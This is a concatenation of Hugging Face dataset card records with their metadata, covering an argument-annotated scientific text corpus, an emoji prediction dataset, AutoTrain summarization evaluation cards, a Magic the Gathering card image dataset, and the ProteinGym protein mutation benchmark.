#task_categories-token-classification #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-dr inventor corpus #language-English #argument mining #scientific text #relation extraction #argumentative discourse unit recognition #region-us
|
# Dataset Card for "sciarg"
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: URL
- Repository: URL
- Paper: An argument-annotated corpus of scientific publications
- Leaderboard:
- Point of Contact:
### Dataset Summary
The SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing
fine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific
publications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of
scientific writing.
### Supported Tasks and Leaderboards
### Languages
The language in the dataset is English.
## Dataset Structure
### Data Instances
### Data Fields
- 'document_id': the base file name, e.g. "A28"
- 'text': the parsed text of the scientific publication in the XML format
- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.
- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.
### Data Splits
The dataset consists of a single 'train' split that has 40 documents.
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @github-username for adding this dataset.
| [
"# Dataset Card for \"sciarg\"",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: URL\n- Repository: URL\n- Paper: An argument-annotated corpus of scientific publications\n- Leaderboard: \n- Point of Contact:",
"### Dataset Summary\n\nThe SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing \nfine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific \npublications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of \nscientific writing.",
"### Supported Tasks and Leaderboards",
"### Languages\n\nThe language in the dataset is English.",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'document_id': the base file name, e.g. \"A28\"\n- 'text': the parsed text of the scientific publication in the XML format\n- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.\n- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.",
"### Data Splits\n\nThe dataset consists of a single 'train' split that has 40 documents.",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] | [
"TAGS\n#task_categories-token-classification #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-dr inventor corpus #language-English #argument mining #scientific text #relation extraction #argumentative discourse unit recognition #region-us \n",
"# Dataset Card for \"sciarg\"",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: URL\n- Repository: URL\n- Paper: An argument-annotated corpus of scientific publications\n- Leaderboard: \n- Point of Contact:",
"### Dataset Summary\n\nThe SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing \nfine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific \npublications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of \nscientific writing.",
"### Supported Tasks and Leaderboards",
"### Languages\n\nThe language in the dataset is English.",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'document_id': the base file name, e.g. \"A28\"\n- 'text': the parsed text of the scientific publication in the XML format\n- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.\n- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.",
"### Data Splits\n\nThe dataset consists of a single 'train' split that has 40 documents.",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] |
0af1841a59d37a07091ea69bce12947558fa4d55 | # Emoji Predictor
The dataset consists of raw tweets as text and an emoji as the label.
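
A minimal way to try the fine-tuned checkpoint linked below (a sketch, assuming it is a standard `transformers` text-classification model whose labels map to emojis):

```python
from transformers import pipeline

# Load the fine-tuned checkpoint and score a raw tweet.
classifier = pipeline("text-classification", model="vincentclaes/emoji-predictor")
print(classifier("just landed in paris, best day ever"))
```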
original dataset: https://huggingface.co/datasets/AlekseyDorkin/extended_tweet_emojis
- Fine-tuned model: https://huggingface.co/vincentclaes/emoji-predictor
- Try the model here: https://huggingface.co/spaces/vincentclaes/emoji-predictor | vincentclaes/emoji-predictor | [
"region:us"
] | 2022-07-28T13:05:10+00:00 | {} | 2022-09-20T13:38:38+00:00 | [] | [] | TAGS
#region-us
| # Emoji Predictor
The dataset consists of raw tweets as text and an emoji as the label.
original dataset: URL
- Fine-tuned model: URL
- Try the model here: URL | [
"# Emoji Predictor\n\nDataset consists of raw tweets as text and an emoji as the label.\noriginal dataset: URL\n\n- Fine-tuned model: URL\n- Try the model here: URL"
] | [
"TAGS\n#region-us \n",
"# Emoji Predictor\n\nDataset consists of raw tweets as text and an emoji as the label.\noriginal dataset: URL\n\n- Fine-tuned model: URL\n- Try the model here: URL"
] |
e81ff8291dc22db23b272e9a5c393d322e530891 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: Blaise-g/led_finetuned_sumpubmed
* Dataset: Blaise-g/SumPubmed
* Config: Blaise-g--SumPubmed
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Blaise-g](https://huggingface.co/Blaise-g) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-Blaise-g__SumPubmed-ce219d86-12025605 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T18:53:37+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["Blaise-g/SumPubmed"], "eval_info": {"task": "summarization", "model": "Blaise-g/led_finetuned_sumpubmed", "metrics": ["bertscore"], "dataset_name": "Blaise-g/SumPubmed", "dataset_config": "Blaise-g--SumPubmed", "dataset_split": "test", "col_mapping": {"text": "text", "target": "abstract"}}} | 2022-07-28T20:06:06+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: Blaise-g/led_finetuned_sumpubmed
* Dataset: Blaise-g/SumPubmed
* Config: Blaise-g--SumPubmed
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @Blaise-g for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: Blaise-g/led_finetuned_sumpubmed\n* Dataset: Blaise-g/SumPubmed\n* Config: Blaise-g--SumPubmed\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Blaise-g for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: Blaise-g/led_finetuned_sumpubmed\n* Dataset: Blaise-g/SumPubmed\n* Config: Blaise-g--SumPubmed\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Blaise-g for evaluating this model."
] |
49bca9d76447b7dbe452b2a8a4426155c28df4ba | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-ca1f103f-12035606 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T18:57:31+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "nbroad/longt5-base-global-mediasum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-28T19:34:23+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
7b01ec427ea3d0e879e4e26ca3cdfa5ce6526ca9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-xsum-20a28003-12045607 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T19:00:01+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["xsum"], "eval_info": {"task": "summarization", "model": "nbroad/longt5-base-global-mediasum", "metrics": [], "dataset_name": "xsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "document", "target": "summary"}}} | 2022-07-28T19:27:48+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
399ed23149edf1be91a18fd8e60e3fea25262dfc |
## Dataset Description
- **Homepage:** the [Gatherer](https://gatherer.wizards.com/Pages/)
- **Repository:** https://github.com/alcazar90/croupier-mtg-dataset
### Dataset Summary
A dataset of card images for 4 types of creatures from the Magic the Gathering card game: elf, goblin, knight, and zombie.
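
A minimal sketch for loading the images, assuming the standard image-classification layout with an `image` column and an integer `label` column:

```python
from datasets import load_dataset

creatures = load_dataset("alkzar90/croupier-mtg-dataset", split="train")

# Map integer labels back to creature names (assumed label order).
names = creatures.features["label"].names
sample = creatures[0]
print(names[sample["label"]])   # e.g. "knight"
sample["image"].show()
```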
## Dataset Creation
All card information from the Magic the Gathering card game is publicly available from the [Gatherer](https://gatherer.wizards.com/Pages/) website, the official Magic Card Database. This dataset is a subset covering four kinds of creatures from the game.
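For quick experimentation, the sketch below loads the dataset; the split name `train` and the column names `image`/`label` are assumptions to verify against the loaded features, not documented facts.

```python
from datasets import load_dataset

# Minimal sketch: load the card-image dataset and inspect its schema.
ds = load_dataset("alkzar90/croupier-mtg-dataset", split="train")  # split name assumed
print(ds.features)  # check the actual image and label column names here

example = ds[0]
example["image"].show()  # assumes a PIL image column named "image"
```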
| alkzar90/croupier-mtg-dataset | [
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:found",
"size_categories:1K<n<10K",
"source_datasets:original",
"license:apache-2.0",
"mgt",
"magic-card-game",
"creature-dataset",
"region:us"
] | 2022-07-28T20:18:49+00:00 | {"annotations_creators": ["found"], "language_creators": [], "language": [], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "Croupier: a Magic the Gathering creatures dataset", "tags": ["mgt", "magic-card-game", "creature-dataset"]} | 2022-08-02T00:41:48+00:00 | [] | [] | TAGS
#task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-found #size_categories-1K<n<10K #source_datasets-original #license-apache-2.0 #mgt #magic-card-game #creature-dataset #region-us
|
## Dataset Description
- Homepage: the Gatherer
- Repository: URL
### Dataset Summary
A dataset of card images covering four types of creatures from the Magic the Gathering card game: elf, goblin, knight, and zombie.
## Dataset Creation
All card information from the Magic the Gathering card game is publicly available from the
Gatherer website, the official Magic Card Database. This dataset is a subset covering four kinds of creatures from the game. | [
"## Dataset Description\n\n- Homepage: the Gatherer\n- Repository: URL",
"### Dataset Summary\n\nA card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.",
"## Dataset Creation\n\nAll card information from Magic the Gathering card game is public available from the \nGatherer website, the official Magic Card Database. The dataset is just\na subset selection of 4 kind of creatures from the game."
] | [
"TAGS\n#task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-found #size_categories-1K<n<10K #source_datasets-original #license-apache-2.0 #mgt #magic-card-game #creature-dataset #region-us \n",
"## Dataset Description\n\n- Homepage: the Gatherer\n- Repository: URL",
"### Dataset Summary\n\nA card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.",
"## Dataset Creation\n\nAll card information from Magic the Gathering card game is public available from the \nGatherer website, the official Magic Card Database. The dataset is just\na subset selection of 4 kind of creatures from the game."
] |
4075aa679683f3071d527283819637f3446ca488 | ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors in different regimes. It comprises two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays, and 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply to the reference sequence to obtain the mutated sequence (e.g., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
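For example, a single assay file can be explored with pandas as sketched below; the assay filename is purely illustrative (only the two reference-file names above are given), while the column names come from the description above.

```python
import pandas as pd

# Reference file for the substitution benchmark (name given above).
ref = pd.read_csv("ProteinGym_reference_file_substitutions.csv")
print(ref[["UniProt_ID", "target_seq"]].head())

# One processed DMS assay; this filename is illustrative, not a real file name.
assay = pd.read_csv("some_substitution_assay.csv")  # columns: mutant, DMS_score, DMS_score_bin

def apply_substitutions(target_seq: str, mutant: str) -> str:
    """Apply a substitution string such as 'A1P:D2N' (1-indexed) to target_seq."""
    seq = list(target_seq)
    for sub in mutant.split(":"):
        wt, pos, mut = sub[0], int(sub[1:-1]), sub[-1]
        assert seq[pos - 1] == wt, f"expected {wt} at position {pos}"
        seq[pos - 1] = mut
    return "".join(seq)
```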
## Reference
If you use ProteinGym in your work, please cite the following paper:
```
Notin, P., Dias, M., Frazer, J., Marchena-Hurtado, J., Gomez, A., Marks, D.S., Gal, Y. (2022). Tranception: Protein Fitness Prediction with Autoregressive Transformers and Inference-time Retrieval. ICML.
```
## Links
- Pre-print: https://arxiv.org/abs/2205.13760
- Code: https://github.com/OATML-Markslab/Tranception | OATML-Markslab/ProteinGym | [
"arxiv:2205.13760",
"region:us"
] | 2022-07-28T21:55:30+00:00 | {} | 2022-07-28T23:12:02+00:00 | [
"2205.13760"
] | [] | TAGS
#arxiv-2205.13760 #region-us
| ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors in different regimes. It comprises two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays, and 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply to the reference sequence to obtain the mutated sequence (e.g., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
## Links
- Pre-print: URL
- Code: URL | [
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\n\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] | [
"TAGS\n#arxiv-2205.13760 #region-us \n",
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\n\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] |
e936ae69e3c70ff651d47889a389de6f596863b2 | ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors in different regimes. It comprises two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays, and 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply to the reference sequence to obtain the mutated sequence (e.g., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
```
Notin, P., Dias, M., Frazer, J., Marchena-Hurtado, J., Gomez, A., Marks, D.S., Gal, Y. (2022). Tranception: Protein Fitness Prediction with Autoregressive Transformers and Inference-time Retrieval. ICML.
```
## Links
- Pre-print: https://arxiv.org/abs/2205.13760
- Code: https://github.com/OATML-Markslab/Tranception
| ICML2022/ProteinGym | [
"arxiv:2205.13760",
"region:us"
] | 2022-07-28T22:16:18+00:00 | {} | 2022-07-28T23:19:31+00:00 | [
"2205.13760"
] | [] | TAGS
#arxiv-2205.13760 #region-us
| ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors in different regimes. It comprises two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays, and 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply to the reference sequence to obtain the mutated sequence (e.g., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
## Links
- Pre-print: URL
- Code: URL
| [
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] | [
"TAGS\n#arxiv-2205.13760 #region-us \n",
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
